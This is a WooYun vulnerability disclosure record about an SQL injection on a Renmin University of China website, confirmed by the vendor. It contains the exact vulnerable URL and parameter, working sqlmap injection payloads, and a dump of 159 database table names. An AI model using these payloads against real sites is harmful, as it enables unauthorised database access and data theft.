当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0156790
漏洞标题:
中国人民大学某站存在SQL注入漏洞
相关厂商:
中国人民大学
漏洞作者:
路人甲
提交时间:
2015-11-30 11:46
修复时间:
2016-01-15 09:14
公开时间:
2016-01-15 09:14
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开

简要描述:

详细说明:

http://eemd.phys.ruc.edu.cn/LiveFiles/Pages/Inner/count.aspx?ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111
涉及17个库:

111.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userName (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111' AND 5013=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5013=5013) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'ckja'='ckja
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ModuleType=Count&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl08&userName=111';WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: eemd
[159 tables]
+--------------------------------+
| ask_Ad                         |
| ask_Announcement               |
| ask_Answers                    |
| ask_Catalog                    |
| ask_Configuration              |
| ask_CreditRule                 |
| ask_CreditRuleLog              |
| ask_Expert                     |
| ask_Links                      |
| ask_Question                   |
| ask_UserGroup                  |
| ask_Users                      |
| ask_Votes                      |
| b2c_Ad                         |
| b2c_Advertisement              |
| b2c_Brand                      |
| b2c_Category                   |
| b2c_CategoryGroup              |
| b2c_Configuration              |
| b2c_ContentGroup               |
| b2c_ContentModel               |
| b2c_GoodsLink                  |
| b2c_GoodsPhoto                 |
| b2c_GoodsType                  |
| b2c_Log                        |
| b2c_RelatedField               |
| b2c_RelatedFieldItem           |
| b2c_Shop                       |
| b2c_Star                       |
| b2c_StarSetting                |
| b2c_StlTag                     |
| b2c_Supplier                   |
| b2c_SystemPermissions          |
| b2c_Tag                        |
| b2c_TagStyle                   |
| b2c_Template                   |
| b2c_TemplateMatch              |
| b2c_UserGroup                  |
| b2c_Users                      |
| bairong_Administrator          |
| bairong_AdministratorsInRoles  |
| bairong_Cache                  |
| bairong_Card                   |
| bairong_CardType               |
| bairong_Config                 |
| bairong_ContentModel           |
| bairong_Count                  |
| bairong_Digg                   |
| bairong_IP2City                |
| bairong_Log                    |
| bairong_Module                 |
| bairong_PayRecord              |
| bairong_Payment                |
| bairong_PermissionsInRoles     |
| bairong_Roles                  |
| bairong_SSOApp                 |
| bairong_TableCollection        |
| bairong_TableMatch             |
| bairong_TableMetadata          |
| bairong_TableStyle             |
| bairong_TableStyleItem         |
| bairong_Tags                   |
| bairong_UserAddCard            |
| bairong_UserBinding            |
| bairong_UserConfig             |
| bairong_UserConsume            |
| bairong_UserCreditsLog         |
| bairong_UserMessage            |
| bairong_UserType               |
| bairong_Users                  |
| bairong_Vote                   |
| bairong_VoteIPAddress          |
| bairong_VoteItem               |
| bbs_Ad                         |
| bbs_Announcement               |
| bbs_Attachment                 |
| bbs_AttachmentType             |
| bbs_Configuration              |
| bbs_CreditRule                 |
| bbs_CreditRuleLog              |
| bbs_Face                       |
| bbs_Forum                      |
| bbs_Icon                       |
| bbs_Identify                   |
| bbs_KeywordsCategory           |
| bbs_KeywordsFilter             |
| bbs_Link                       |
| bbs_Navigation                 |
| bbs_Online                     |
| bbs_Permissions                |
| bbs_Poll                       |
| bbs_PollItem                   |
| bbs_PollUser                   |
| bbs_Post                       |
| bbs_Report                     |
| bbs_Thread                     |
| bbs_ThreadCategory             |
| bbs_UserGroup                  |
| bbs_Users                      |
| liveserver_Activity            |
| liveserver_BlogCategory        |
| liveserver_BlogContent         |
| liveserver_Comment             |
| liveserver_Configuration       |
| liveserver_Favorite            |
| liveserver_Friends             |
| liveserver_Message             |
| liveserver_MyWeb               |
| liveserver_PhotoContent        |
| liveserver_PhotoContentsInSets |
| liveserver_PhotoSet            |
| liveserver_Rss                 |
| liveserver_Tag                 |
| liveserver_UserContent         |
| liveserver_Users               |
| liveserver_Visitors            |
| liveserver_Word                |
| siteserver_Ad                  |
| siteserver_Advertisement       |
| siteserver_Comment             |
| siteserver_Configuration       |
| siteserver_Content             |
| siteserver_ContentGroup        |
| siteserver_GatherDatabaseRule  |
| siteserver_GatherFileRule      |
| siteserver_GatherRule          |
| siteserver_InnerLink           |
| siteserver_Input               |
| siteserver_InputContent        |
| siteserver_JobContent          |
| siteserver_Log                 |
| siteserver_Machine             |
| siteserver_MailSendLog         |
| siteserver_MailSubscribe       |
| siteserver_MenuDisplay         |
| siteserver_Node                |
| siteserver_NodeGroup           |
| siteserver_PagePermissions     |
| siteserver_PhotoContent        |
| siteserver_PublishmentSystem   |
| siteserver_RelatedField        |
| siteserver_RelatedFieldItem    |
| siteserver_ResumeContent       |
| siteserver_SeoMeta             |
| siteserver_SeoMetasInNodes     |
| siteserver_Star                |
| siteserver_StarSetting         |
| siteserver_StlTag              |
| siteserver_SystemPermissions   |
| siteserver_TagStyle            |
| siteserver_Task                |
| siteserver_TaskLog             |
| siteserver_Template            |
| siteserver_TemplateMatch       |
| siteserver_TemplateRule        |
| siteserver_Tracking            |
| siteserver_UserContent         |
| siteserver_UserGroup           |
| siteserver_Users               |
+--------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-01 09:12

厂商回复:

确认,已通知相关人员进行处理

最新状态:

暂无